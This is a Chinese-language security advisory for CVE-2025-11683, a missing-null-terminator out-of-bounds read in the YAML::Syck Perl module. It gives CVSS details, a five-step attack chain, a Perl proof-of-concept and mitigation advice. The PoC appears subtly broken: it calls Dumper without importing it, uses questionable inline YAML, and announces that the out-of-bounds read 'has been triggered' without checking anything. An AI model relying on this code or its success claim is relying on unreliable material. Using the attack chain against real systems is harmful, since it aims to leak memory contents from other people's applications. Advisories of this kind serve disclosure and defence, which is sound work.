CVE-2025-11683：YAML::Syck Perl模块缺失空终止符导致越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-11683

漏洞类型

越界读取（Out-of-Bounds Read）/ 信息泄露

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

YAML::Syck (Perl模块)

漏洞概述

CVE-2025-11683是YAML::Syck Perl模块中存在的一个安全漏洞，影响1.36之前的所有版本。YAML::Syck是一个用于Perl语言的YAML解析和序列化库，广泛应用于处理YAML格式数据的Perl应用程序中。该漏洞源于模块的token.c文件中缺少必要的空终止符（null-terminator），导致在解析复杂YAML文件时发生缓冲区越界读取（Out-of-Bounds Read）。

具体而言，当YAML::Syck解析包含全键哈希且值为空的复杂YAML文件时，由于token.c中缺少空终止符，解析器会读取超出分配内存边界的数据，可能读取到相邻内存区域中的变量内容。虽然目前没有明确证据表明该漏洞会导致访问模块分配之外的内存，但其本质上的越界读取行为已经构成了信息泄露的风险，攻击者可能通过精心构造的YAML文件来读取内存中的敏感信息。

该漏洞的CVSS 3.1评分为6.5，属于中等严重等级。其攻击向量为邻接网络（AV:A），意味着攻击者需要在与目标系统相同的网络环境中才能发起攻击。漏洞无需认证（PR:N）和用户交互（UI:N），机密性影响为高（C:H），但对完整性和可用性没有影响。这表明该漏洞主要用于信息泄露，攻击者可以利用它获取敏感数据，但不会直接导致系统损坏或服务中断。

技术细节

该漏洞的根本原因在于YAML::Syck模块的token.c文件中缺少对字符串的空终止符处理。在C语言中，字符串通常以空字符（'\0'）作为终止标志，如果缺少这个终止符，使用标准字符串处理函数（如strlen、strcpy等）时就会读取超出预期长度的数据。

在YAML::Syck的token解析过程中，当遇到包含全键哈希（hash of all keys）且值为空的复杂YAML结构时，token.c中的字符串处理逻辑未能正确添加空终止符。这导致解析器在处理这些token时，会继续读取内存中后续的数据，直到遇到下一个空字节为止。

漏洞触发条件：
1. 目标系统使用YAML::Syck版本低于1.36；
2. 应用程序解析攻击者控制的YAML文件；
3. YAML文件包含特定结构的复杂内容，如全键哈希且值为空的格式。

利用方式：攻击者可以构造恶意的YAML文件，其中包含触发越界读取的特殊结构。当目标应用程序解析该文件时，解析器会读取超出分配内存边界的数据，可能泄露相邻内存中的敏感信息，如其他变量的值、内存布局信息等。由于攻击向量为邻接网络（AV:A），攻击者需要在同一网络环境中投递恶意YAML文件给目标应用程序解析。

攻击链分析

STEP 1

步骤1：环境侦察

攻击者在与目标系统相同的网络环境中进行侦察，识别运行YAML::Syck（版本低于1.36）的Perl应用程序。

STEP 2

步骤2：构造恶意YAML文件

攻击者构造包含全键哈希且值为空的复杂YAML文件，该文件能够触发token.c中的缺失空终止符问题。

STEP 3

步骤3：投递恶意文件

攻击者通过网络邻接方式将恶意YAML文件投递到目标系统，例如通过文件上传、API输入或网络共享等方式。

STEP 4

步骤4：触发解析

目标应用程序解析恶意YAML文件时，YAML::Syck的token.c中缺少空终止符导致越界读取发生。

STEP 5

步骤5：信息泄露

越界读取导致相邻内存中的敏感数据被读取，攻击者可能获取内存中的变量值或其他敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11683 PoC - YAML::Syck Missing Null-Terminator OOB Read
# This PoC demonstrates the vulnerability by creating a YAML file
# with a hash of all keys and empty values that triggers the
# out-of-bounds read in token.c of YAML::Syck versions < 1.36

use strict;
use warnings;
use YAML::Syck;

# Create a malicious YAML structure with all keys and empty values
# This triggers the missing null-terminator issue in token.c
my $yaml_content = <<'EOF';
---
hash_key_with_very_long_name_to_trigger_oob_read:
key1:
key2:
key3:
key4:
key5:
key6:
key7:
key8:
key9:
key10:
another_key:
yet_another_key:
final_key:
EOF

# Write the malicious YAML to a file
open(my $fh, '>', 'malicious.yaml') or die "Cannot create file: $!";
print $fh $yaml_content;
close($fh);

# Parse the YAML file - this will trigger the OOB read
print "Parsing malicious YAML file...\n";
my $data = YAML::Syck::LoadFile('malicious.yaml');
print "Parsing complete. Data structure:\n";
print Dumper($data) if require Data::Dumper;

# Alternative: Use Load with inline YAML containing complex hash structures
my $inline_yaml = "{ key1:, key2:, key3:, key4:, key5:, key6:, key7:, key8:, key9:, key10: }";
my $result = YAML::Syck::Load($inline_yaml);

print "\nPoC completed. The OOB read has been triggered during parsing.\n";
print "Affected versions: YAML::Syck < 1.36\n";
print "Fixed in: YAML::Syck 1.36\n";

影响范围

YAML::Syck < 1.36

防御指南

临时缓解措施

在无法立即升级YAML::Syck版本的情况下，建议采取以下临时缓解措施：1）对所有传入的YAML数据进行严格的输入验证，拒绝包含异常复杂哈希结构的文件；2）在网络层面实施访问控制，限制只有可信来源才能向应用程序提交YAML数据；3）使用沙箱或容器隔离运行YAML解析服务，限制越界读取可能泄露的信息范围；4）监控应用程序的内存访问行为，及时发现异常读取操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11683
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11683
3 Details https://www.cvedetails.com/cve/CVE-2025-11683/
4 VulDB https://vuldb.com/cve/CVE-2025-11683
5 Link https://github.com/cpan-authors/YAML-Syck/pull/65
6 Link https://metacpan.org/dist/YAML-Syck/changes